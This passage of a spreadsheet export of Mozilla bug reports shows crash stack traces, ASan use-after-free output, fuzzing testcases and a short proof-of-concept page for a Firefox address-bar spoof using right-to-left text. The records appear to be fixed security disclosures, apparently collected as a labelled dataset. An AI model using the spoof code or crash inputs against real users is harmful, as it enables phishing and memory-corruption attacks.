&gt;    #15 0x7f8053e70018 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:487
&gt;    #16 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #17 0x7f8053de6161 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:430
&gt;    #18 0x7f8053de9df0 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:530
&gt;    #19 0x7f8053dee2b3 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:771
&gt;    #20 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #21 0x7f80541a0ebd in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
&gt;    #22 0x7f80539480b2 in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7801
&gt;    #23 0x7f8053975911 in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7942
&gt;    #24 0x7f80539740cd in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) src/layout/base/nsPresShell.cpp:3932
&gt;    #25 0x7f8053972727 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3778
&gt;    #26 0x7f80551df86e in nsDocument::FlushPendingNotifications(mozFlushType) src/content/base/src/nsDocument.cpp:6986
&gt;    #27 0x7f80553978f8 in mozilla::dom::Element::GetPrimaryFrame(mozFlushType) src/content/base/src/Element.cpp:1626
&gt;    #28 0x7f8055397507 in mozilla::dom::Element::GetStyledFrame() src/content/base/src/Element.cpp:486
&gt;    #29 0x7f805624e20f in nsGenericHTMLElement::GetOffsetRect(nsRect&amp;) src/content/html/content/src/nsGenericHTMLElement.cpp:397
&gt;Shadow bytes around the buggy address:
&gt;  0x0c0100034260: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c0100034270: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c0100034280: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c0100034290: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c01000342a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;=&gt;0x0c01000342b0: fa fa fd fd fa fa[fd]fd fa fa fd fd fa fa fd fd
&gt;  0x0c01000342c0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c01000342d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c01000342e0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c01000342f0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;  0x0c0100034300: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;==16813== ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X6065" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6066">
      <c r="A6066" t="n">
        <v>1562102</v>
      </c>
      <c r="B6066" t="inlineStr">
        <is>
          <t>2019-06-27 19:09:55 -0700</t>
        </is>
      </c>
      <c r="C6066" t="inlineStr">
        <is>
          <t>Assertion failure: *stack == reinterpret_cast&lt;Rooted&lt;void*&gt;*&gt;(this), at dist/include/js/RootingAPI.h:1061 with ES6 classes</t>
        </is>
      </c>
      <c r="D6066" t="inlineStr">
        <is>
          <t>2023-12-06 07:55:46 -0800</t>
        </is>
      </c>
      <c r="E6066" t="n">
        <v>1</v>
      </c>
      <c r="F6066" t="n">
        <v>1</v>
      </c>
      <c r="G6066" t="n">
        <v>3</v>
      </c>
      <c r="H6066" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6066" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6066" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6066" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6066" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6066" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6066" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6066" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6066" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6066" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6066" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6066" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T6066" t="n">
        <v>1</v>
      </c>
      <c r="U6066" t="n">
        <v>0</v>
      </c>
      <c r="V6066" t="n">
        <v>22</v>
      </c>
      <c r="W6066" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7ffabb358c42 (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --baseline-eager --no-ion):
    // Adapted from randomly chosen test: js/src/tests/test262/language/statements/class/elements/after-same-line-static-async-gen-rs-field-identifier.js
    oomTest(
        new Function(`
            evaluate(\`
                class C {
                    c;
                    _;
                    2;
                    u;
                    J;
                    _;
                }
                t(C);
                function s() {
                    e;
                    if (r) {
                        0;
                    }
                    c1 = 1;
                    t.e(
                        c
                        .a2,
                        1
                    );
                    s
                    .s( 
                        c8,
                        1
                    );
                    a
                    (   
                        c
                        .J
                        , 1
                    );
                    u
                    (   
                        c
                        ._
                        , 1
                    );
                }
                e.r;
            \`, {
                compileAndGo: true
            })
        `)
    )
Backtrace:
```
#0  JS::Rooted&lt;JSAtom*&gt;::~Rooted (this=0x7f6e13c19040) at /home/ubuntu/shell-cache/js-dbg-64-dm-linux-x86_64-7ffabb358c42/objdir-js/dist/include/js/RootingAPI.h:1061
#1  js::frontend::BytecodeEmitter::emitClass (this=&lt;optimized out&gt;, classNode=&lt;optimized out&gt;, nameKind=js::frontend::BytecodeEmitter::ClassNameKind::BindingName, nameForAnonymousClass=...) at js/src/frontend/BytecodeEmitter.cpp:8850
#2  0x0000558d18a6077b in js::frontend::BytecodeEmitter::emitTree (this=0x7ffe1a198340, pn=0x7f6e13cde998, valueUsage=js::frontend::ValueUsage::WantValue, emitLineNote=js::frontend::BytecodeEmitter::EMIT_LINENOTE) at js/src/frontend/BytecodeEmitter.cpp:9393
#3  0x0000558d18a610a9 in js::frontend::BytecodeEmitter::emitStatementList (this=&lt;optimized out&gt;, stmtList=&lt;optimized out&gt;) at js/src/frontend/BytecodeEmitter.cpp:6726
#4  js::frontend::BytecodeEmitter::emitTree (this=0x7ffe1a198340, pn=0x7f6e13cdd020, valueUsage=js::frontend::ValueUsage::WantValue, emitLineNote=&lt;optimized out&gt;) at js/src/frontend/BytecodeEmitter.cpp:9030
#5  0x0000558d18a55722 in js::frontend::BytecodeEmitter::emitScript (this=0x7ffe1a198340, body=0x7f6e13cdd020) at js/src/frontend/BytecodeEmitter.cpp:2455
/snip
```
For detailed crash information, see attachment.
Setting s-s as a start as this seems like a Rooting / GC assertion failure.</t>
        </is>
      </c>
      <c r="X6066" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6067">
      <c r="A6067" t="n">
        <v>1451774</v>
      </c>
      <c r="B6067" t="inlineStr">
        <is>
          <t>2018-04-05 08:56:31 -0700</t>
        </is>
      </c>
      <c r="C6067" t="inlineStr">
        <is>
          <t>Make Django migrations pass under Python 3</t>
        </is>
      </c>
      <c r="D6067" t="inlineStr">
        <is>
          <t>2018-04-06 07:15:59 -0700</t>
        </is>
      </c>
      <c r="E6067" t="n">
        <v>1</v>
      </c>
      <c r="F6067" t="n">
        <v>1</v>
      </c>
      <c r="G6067" t="n">
        <v>7</v>
      </c>
      <c r="H6067" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6067" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6067" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6067" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6067" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6067" t="inlineStr"/>
      <c r="Q6067" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6067" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6067" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6067" t="n">
        <v>1</v>
      </c>
      <c r="U6067" t="n">
        <v>0</v>
      </c>
      <c r="V6067" t="n">
        <v>3</v>
      </c>
      <c r="W6067" t="inlineStr">
        <is>
          <t>They currently fail with:
"""
CommandError: Conflicting migrations detected; multiple leaf nodes in the migration graph: (0006_add_alert_summary_notes, 0001_squashed_0005_permit_github_links in perf; 0001_squashed_0022_modify_bugscache_and_bugjobmap, 0022_modify_bugscache_and_bugjobmap in model).
To fix them run 'python manage.py makemigrations --merge'
"""
Digging into this:
* The error message is misleading, and is actually due to the bytestring prefixes in the squashed migrations `replaces` property.
* Adding `from __future__ import unicode_literals` to `settings.py` would prevent the output from the `squashmigrations` command from containing these spurious bytestring prefixes.
* For now manually editing the squashed migrations to remove the prefixes fixes the issue.
* However this seems like something Django could make "just work" by coercing to string (like it does in a number of other cases) or at the least fix the misleading error message.
As such I've filed:
https://code.djangoproject.com/ticket/29290
(Though we won't want to wait for that to be fixed)</t>
        </is>
      </c>
      <c r="X6067" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6068">
      <c r="A6068" t="n">
        <v>852315</v>
      </c>
      <c r="B6068" t="inlineStr">
        <is>
          <t>2013-03-18 15:34:39 -0700</t>
        </is>
      </c>
      <c r="C6068" t="inlineStr">
        <is>
          <t>plugin crash running script during plugin destruction</t>
        </is>
      </c>
      <c r="D6068" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6068" t="n">
        <v>1</v>
      </c>
      <c r="F6068" t="n">
        <v>1</v>
      </c>
      <c r="G6068" t="n">
        <v>6</v>
      </c>
      <c r="H6068" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6068" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6068" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6068" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6068" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6068" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6068" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6068" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q6068" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6068" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6068" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T6068" t="n">
        <v>1</v>
      </c>
      <c r="U6068" t="n">
        <v>0</v>
      </c>
      <c r="V6068" t="n">
        <v>51</v>
      </c>
      <c r="W6068" t="inlineStr">
        <is>
          <t>I made a clean debug mac build of rev e23e43a2c14e
If I load
http://congressoamericano.blogspot.ca/
wait for the music to start, then click on the stop button I get a crash. The stack goes from plugin destruction into running a script which plays with things and that causes the crash.
This page hasn't had a problem for me before, so I suspect something changed, either the website or something on mozilla-central.
This doesn't seem to crash the latest nightly for whatever reason.</t>
        </is>
      </c>
      <c r="X6068" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6069">
      <c r="A6069" t="n">
        <v>573879</v>
      </c>
      <c r="B6069" t="inlineStr">
        <is>
          <t>2010-06-22 17:41:43 -0700</t>
        </is>
      </c>
      <c r="C6069" t="inlineStr">
        <is>
          <t>no contrib directory for Firefox 3.6.4</t>
        </is>
      </c>
      <c r="D6069" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6069" t="n">
        <v>1</v>
      </c>
      <c r="F6069" t="n">
        <v>1</v>
      </c>
      <c r="G6069" t="n">
        <v>5</v>
      </c>
      <c r="H6069" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6069" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6069" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6069" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6069" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6069" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6069" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6069" t="inlineStr"/>
      <c r="Q6069" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6069" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6069" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6069" t="n">
        <v>1</v>
      </c>
      <c r="U6069" t="n">
        <v>0</v>
      </c>
      <c r="V6069" t="n">
        <v>2</v>
      </c>
      <c r="W6069" t="inlineStr">
        <is>
          <t>contrib directory was not created for Firefox 3.6.4 build7 and release.
/mnt/netapp/stage/archive.mozilla.org/pub/firefox/releases/3.6.4
/mnt/netapp/stage/archive.mozilla.org/pub/firefox/nightly/3.6.4-candidates/build7</t>
        </is>
      </c>
      <c r="X6069" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6070">
      <c r="A6070" t="n">
        <v>652908</v>
      </c>
      <c r="B6070" t="inlineStr">
        <is>
          <t>2011-04-26 12:09:22 -0700</t>
        </is>
      </c>
      <c r="C6070" t="inlineStr">
        <is>
          <t>Don't use ’ in the copy</t>
        </is>
      </c>
      <c r="D6070" t="inlineStr">
        <is>
          <t>2022-03-04 12:32:42 -0800</t>
        </is>
      </c>
      <c r="E6070" t="n">
        <v>1</v>
      </c>
      <c r="F6070" t="n">
        <v>1</v>
      </c>
      <c r="G6070" t="n">
        <v>6</v>
      </c>
      <c r="H6070" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6070" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J6070" t="inlineStr">
        <is>
          <t>markup.mozilla.org</t>
        </is>
      </c>
      <c r="K6070" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6070" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6070" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6070" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6070" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6070" t="inlineStr"/>
      <c r="Q6070" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6070" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6070" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T6070" t="n">
        <v>1</v>
      </c>
      <c r="U6070" t="n">
        <v>0</v>
      </c>
      <c r="V6070" t="n">
        <v>5</v>
      </c>
      <c r="W6070" t="inlineStr">
        <is>
          <t>Created attachment 528391
Screenshot
The nice-looking apostrophe ’ isn't extracted well, as it's not one of the basic ASCII chars.
#: templates_orig/about.html:27
msgid ""
"Hereâs where youâll find more information on Mozilla, Evan Roth and the "
"project born of their collaboration."
msgstr ""
https://github.com/mozilla/markup/blob/master/ffdemo/templates_orig/about.html#L27
I think it renders the affected strings unlocalizable.</t>
        </is>
      </c>
      <c r="X6070" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6071">
      <c r="A6071" t="n">
        <v>1395508</v>
      </c>
      <c r="B6071" t="inlineStr">
        <is>
          <t>2017-08-31 03:07:56 -0700</t>
        </is>
      </c>
      <c r="C6071" t="inlineStr">
        <is>
          <t>Firefox address bar spoof using RTL language and references</t>
        </is>
      </c>
      <c r="D6071" t="inlineStr">
        <is>
          <t>2024-10-18 09:08:16 -0700</t>
        </is>
      </c>
      <c r="E6071" t="n">
        <v>1</v>
      </c>
      <c r="F6071" t="n">
        <v>1</v>
      </c>
      <c r="G6071" t="n">
        <v>2</v>
      </c>
      <c r="H6071" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6071" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6071" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K6071" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L6071" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6071" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6071" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6071" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6071" t="inlineStr">
        <is>
          <t>[fxsearch][adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6071" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6071" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6071" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T6071" t="n">
        <v>1</v>
      </c>
      <c r="U6071" t="n">
        <v>0</v>
      </c>
      <c r="V6071" t="n">
        <v>96</v>
      </c>
      <c r="W6071" t="inlineStr">
        <is>
          <t>Created attachment 8903091
spoof.png
Firefox address bar spoof using hebrew on Windows/macOS.
poc.html
&lt;meta http-equiv="content-type" content="text/html;charset=utf-8"&gt;
&lt;script&gt;
    function aa(){
        var link = document.createElement('a');
        link.href = "https://xn--ggbla1c4e.xn--ngbc5azd/#"+Array(0x200).join("%20")+"סוֹ.סח";
        link.target="aaaa";
        document.body.appendChild(link);
        link.click();
    }
&lt;/script&gt;
&lt;a onclick="aa();" href="javascript:void(0);"&gt;CLICK ME&lt;/a&gt;
Expected Result:
https://اسماء.شبكة
Rendered Results:
https://no.io</t>
        </is>
      </c>
      <c r="X6071" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6072">
      <c r="A6072" t="n">
        <v>861089</v>
      </c>
      <c r="B6072" t="inlineStr">
        <is>
          <t>2013-04-12 00:49:49 -0700</t>
        </is>
      </c>
      <c r="C6072" t="inlineStr">
        <is>
          <t>Investigate excessive traffic from Personas Plus</t>
        </is>
      </c>
      <c r="D6072" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:01 -0800</t>
        </is>
      </c>
      <c r="E6072" t="n">
        <v>1</v>
      </c>
      <c r="F6072" t="n">
        <v>1</v>
      </c>
      <c r="G6072" t="n">
        <v>6</v>
      </c>
      <c r="H6072" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6072" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J6072" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K6072" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6072" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6072" t="inlineStr"/>
      <c r="Q6072" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6072" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6072" t="inlineStr">
        <is>
          <t>2013-04-18</t>
        </is>
      </c>
      <c r="T6072" t="n">
        <v>1</v>
      </c>
      <c r="U6072" t="n">
        <v>0</v>
      </c>
      <c r="V6072" t="n">
        <v>2</v>
      </c>
      <c r="W6072" t="inlineStr">
        <is>
          <t>We're seeing tons of traffic to /collections/mine/favorites/format:json URLs on AMO.  Something on the order of &gt;100 million hits in less than 24 hours.  With 1.5M users of the add-on that doesn't seem to add up.
There are a bunch more specifics on IRC but y'all were there for them so I won't retype them here.
Until we've got a fix, we've set that URL to 503 every request so favorites in the add-on are effectively disabled for now.</t>
        </is>
      </c>
      <c r="X6072" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6073">
      <c r="A6073" t="n">
        <v>1420507</v>
      </c>
      <c r="B6073" t="inlineStr">
        <is>
          <t>2017-11-24 12:14:22 -0800</t>
        </is>
      </c>
      <c r="C6073" t="inlineStr">
        <is>
          <t>Reader view ignores crossorigin attribute</t>
        </is>
      </c>
      <c r="D6073" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:56 -0700</t>
        </is>
      </c>
      <c r="E6073" t="n">
        <v>1</v>
      </c>
      <c r="F6073" t="n">
        <v>1</v>
      </c>
      <c r="G6073" t="n">
        <v>3</v>
      </c>
      <c r="H6073" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6073" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6073" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6073" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6073" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6073" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6073" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6073" t="inlineStr">
        <is>
          <t>[adv-main58+]</t>
        </is>
      </c>
      <c r="Q6073" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6073" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6073" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T6073" t="n">
        <v>1</v>
      </c>
      <c r="U6073" t="n">
        <v>0</v>
      </c>
      <c r="V6073" t="n">
        <v>35</v>
      </c>
      <c r="W6073" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
1. Go to https://test.shhnjk.com/vidcors.html.
2. Observe an alert saying "Blocked by CORS".
3. Click on open in reader view button.
Actual results:
Cross-origin video loaded (crossorigin attribute ignored).
Expected results:
Crossorigin attribute in reader view should be respected as normal page.</t>
        </is>
      </c>
      <c r="X6073" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6074">
      <c r="A6074" t="n">
        <v>1696816</v>
      </c>
      <c r="B6074" t="inlineStr">
        <is>
          <t>2021-03-07 08:48:39 -0800</t>
        </is>
      </c>
      <c r="C6074" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ _pixman_image_validate] when print or save to PDF</t>
        </is>
      </c>
      <c r="D6074" t="inlineStr">
        <is>
          <t>2024-05-30 10:28:43 -0700</t>
        </is>
      </c>
      <c r="E6074" t="n">
        <v>1</v>
      </c>
      <c r="F6074" t="n">
        <v>1</v>
      </c>
      <c r="G6074" t="n">
        <v>3</v>
      </c>
      <c r="H6074" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6074" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6074" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6074" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6074" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6074" t="inlineStr">
        <is>
          <t>[fixed by Cairo update][reporter-external] [client-bounty-form] [verif?][adv-main90+]</t>
        </is>
      </c>
      <c r="Q6074" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6074" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6074" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T6074" t="n">
        <v>1</v>
      </c>
      <c r="U6074" t="n">
        <v>0</v>
      </c>
      <c r="V6074" t="n">
        <v>12</v>
      </c>
      <c r="W6074" t="inlineStr">
        <is>
          <t>Created attachment 9207325
testcase.html
By set CSS universal selector `*` with property `clip-path: polygon` `&lt;clip-source&gt;` and `&lt;basic-shape&gt;`  with value more than or equal to 13 then add `mix-blend-mode: soft-light` to the selector. After print the web pages dialog show then Save to PDF, the entire browser is crashed with heap-use-after-free.
## Affected version:
- Firefox Nightly 88.0a1 (2021-03-07) (64-bit) on Arch Linux and Windows 10
- Firefox Release 86.0 (64-bit)
- Firefox ESR 78.8.0esr (64-bit)
## Steps to reproduce:
1. Visit attached testcase.html
2. When print dialog show, select Destination "Save to PDF" (default on my desktop) or "Print to File" (on Firefox ESR Linux)
3. Click "Save" or "Print"
4. Browser crashed
## ASAN output:
```
=================================================================
==551946==ERROR: AddressSanitizer: heap-use-after-free on address 0x612004964470 at pc 0x7fdb24e356a1 bp 0x7ffe4fc02a20 sp 0x7ffe4fc02a18
READ of size 4 at 0x612004964470 thread T0
    #0 0x7fdb24e356a0 in _pixman_image_validate /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman-image.c:549:23
    #1 0x7fdb24eac48f in _moz_pixman_image_composite32 /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman.c:587:2
    #2 0x7fdb24ca6a43 in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3051:3
    #3 0x7fdb24ca6a43 in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #4 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #5 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #6 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #7 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #8 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
